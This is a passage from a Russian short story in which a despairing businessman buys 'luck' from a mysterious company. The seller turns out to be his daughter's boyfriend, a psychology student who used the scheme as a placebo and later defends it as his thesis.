    - Можно. – впервые за последние несколько месяцев улыбнулся несостоявшийся самоубийца. Желательно бы оплатить все вперед только, а то сейчас время такое…
    И дела пошли. Алексей работал, как вол, но все шло просто замечательно. Договора подписывались, сотрудники повыключали косынки и саперы, банк даже выдал очередной кредит, когда предприниматель хлопнул перед специалистом отдела кредитования пачку подписанных договоров на весьма приличную сумму. Алексей Сергеевич, конечно, очень сильно рисковал, когда их подписывал, ведь необходимой электроники на складе не было, и имеющихся денег не хватало, чтобы обеспечить закупку у производителей. Но все обходилось – Общество с Ограниченной Ответственностью поставляло ему удачу в неограниченных количествах. Один раз, правда, сорвалась крупная сделка. Однако, на резонный вопрос Алексея к ООО «а почему так?», сильный голос ответил: «Все что с вами сейчас не случается, все к лучшему. Сделка с той компанией обернулась бы для вас серьезными проблемами».
    Это был единственный раз, когда бизнесмен созванивался с ООО во время действия контракта
    Однако, дело шло к расплате. Фирма Алексея уже вылезла из ямы, долги по зарплате были погашены с лихвой, сотрудникам была выдана немаленькая премия «за моральный ущерб», погашение кредитов шло в положенные сроки.
    И вот теперь бизнесмен снова уже не мог спать. Но уже по другой причине. Неназванная цена услуг ООО сводила с ума. Уже не казалось абсурдным предположение, что он продал душу дьяволу.
    Напряжение росло. Звонить первым и объявлять о прекращении договора, было еще страшнее, чем жать на курок пистолета, нацеленного в собственный висок. С одной стороны, Алесей Сергеевич понимал, что чем дольше он пользуется услугами ООО, тем больше будет и цена, но заставить себя набрать нехитрый номерок не отваживался. Он даже не мог представить какова будет цена за то количество удачи, которое он уже потребил…
    Теперь вечерами он сидел перед телевизором, бессмысленно уставившись в картинку на экране, подрагивая от каждого звонка. В конторе дела шли отлично, раскрученный механизм работал и без него, что, к сожалению, оставляло ему больше времени на страхи. В один из таких вечеров к нему подошла дочь:
    - Пап, на тебе в последнее время лица нет. Что-то случилось?
    Отец посмотрел на неё.
    - За все надо платить, доченька. За все… - пробормотал он. – Настенька, я тебя очень люблю, ты на меня ни за что не в обиде? Я в последнее время так мало с тобой общался…
    - И я тебя люблю, папа. Конечно, нет, тебе ж столько работать приходилось. Да я же не маленькая девочка, чтоб за мной бегать. За мной уже другие бегают. – дочь смущенно хихикнула.
    - У тебя кто-то есть? – спросил Алексей.
    «Надо же, из-за этих чертовых денег, я почти ничего о собственном ребенке»
    Неожиданно волна настоящей теплой отеческой любви захлестнула мужчину. Он четко вспомнил тот день, когда она произнесла свое первое слово. «Мама». Жена Леши главного слова уже не услышала, оставив молодого парня вдовцом за несколько дней до этого. В тот момент молодой отец первый раз оказался в ситуации, когда жить просто не хотелось. Тогда его спасла именно дочь: голодный плач Насти ясно сказал ему – у тебя есть то, ради чего ты ОБЯЗАН жить.
    Дочка смущенно заулыбалась.
    - Ну да, я ведь все хотела вас познакомить, не помнишь? Коля.
    - Нууу... Так вроде…– Алексей замялся.
    - Да знаю, что не помнишь, - озорно сверкнула глазками Настя.
    - Слушай, а приглашай его сегодня в гости. – предложил бизнесмен. – Пообщаемся, познакомлюсь хоть, кто там за дочуркой моей ухаживает.
    - Он тебе понравится, пап! Сейчас я ему позвоню! – воскликнула девушка и убежала.
    Алексей отправился в кабинет – времени на готовку ужина не было, хотя бы заказать в каком-нибудь ресторане.
    А ровно через полтора часа раздался звонок в дверь.
    - Коля приехал! – радостно воскликнула дочь. – папа, открой дверь пожалуйста, я еще не совсем готова!
    Мужчина распахнул входную дверь. На пороге стоял приятный молодой человек с букетом цветов.
    Который таким знакомым, сильным и уверенным голосом произнес:
    - Здравствуйте, Алексей Сергеевич. Я думаю, вы понимаете, какова будет цена.
    Сердце остановилось.
    ...
    - Это случилось несколько месяцев назад. – начал свой рассказ Николай. – Я стал замечать, что Настя очень грустная стала, какая-то рассеянная. По учебе проблемы начались, со мной почти не общалась. Я переживал очень, люблю же. А однажды прибежала вся заплаканная, говорит, у отца в бизнесе все ужасно, света белого не видит. А однажды даже видела вас с пистолетом. Помоги, мол, ты же на психолога учишься, поддержи словом. Я как раз диплом писать начал. Она попыталась устроить нашу встречу, но вы замкнулись, никого не видеть, ни слышать не хотели. Вот собственно мы и придумали этот план. Понимаете ли, когда человек знает, что ему повезет, действует уверенно, у него, как правило, все получается. Моя задача была убедить вас в том, что вам все по плечу. Сделать это было очень сложно, я же вас никогда не видел и не знал. Приходилось составлять ваш психологический портрет исключительно по Настиным рассказам. Причем, делать это быстро. Сочетание мистики и делового подхода оказалось крайне удачным. Единственный момент, в котором я совершил глупую ошибку, мальчишечью выходку – это когда я сказал вам, что цена будет измеряться не в деньгах. Я тогда еще подумал, вот было бы здорово, если бы я попросил руки вашей дочери именно так. Я еще раз прошу прощения.
    Алексей Сергеевич молча смотрел на молодого человека. Мир вокруг снова становился спокойным, вполне рациональным и объяснимым. Это было странное ощущение. С одной стороны опять не стало в жизни места для сказки и волшебства, с другой - как же было здорово, что этот кошмар закончился.
    - У меня к тебе вопрос такой, Коля. Помнишь, я как –то позвонил и спросил насчет сорвавшейся сделки. Твой ответ был импровизацией?
    - Нет. Это была заготовка. По правде говоря, я был удивлен, что у вас была только ОДНА неудача. Ожидалось гораздо больше, сами понимаете, по каким причинам, но ваши резервы энергии оказались совершенно потрясающими. Вы очень уверенно пошли.
    Алексей Сергеевич, я ведь не давал вам лекарство. Я дал вам плацебо. И я рад, что оно смогло вам помочь.
    ...
    - Студент Местников Николай речь закончил. Уважаемые члены комиссии, спасибо за внимание!
    Профессора молча разглядывали стоящего перед ними выпускника. Наконец, один из них, потерев старческий нос между сложенными коробочкой ладонями, произнес:
    - Студент Местников, у меня к вам собственно, один вопрос. Вот вы сказали человеку, что дарите ему везение, фарт, удачу. Откуда вы знали, что тот не возьмет все, что у него было, и не пойдет в казино, чтоб поставить все на «зеро»?
    - Это было известно абсолютно точно, исходя из того, что рассказывала о нем его дочь. Она говорила, что Алексей Сергеевич терпеть не мог игроманов в любых проявлениях, испытывал крайнее презрение к заведениям подобного рода. – ответил сильный и уверенный голос.
    ...
    – Черт, как же я забыл про эту чертову рулетку?! Но все ведь обошлось… Слава Богу…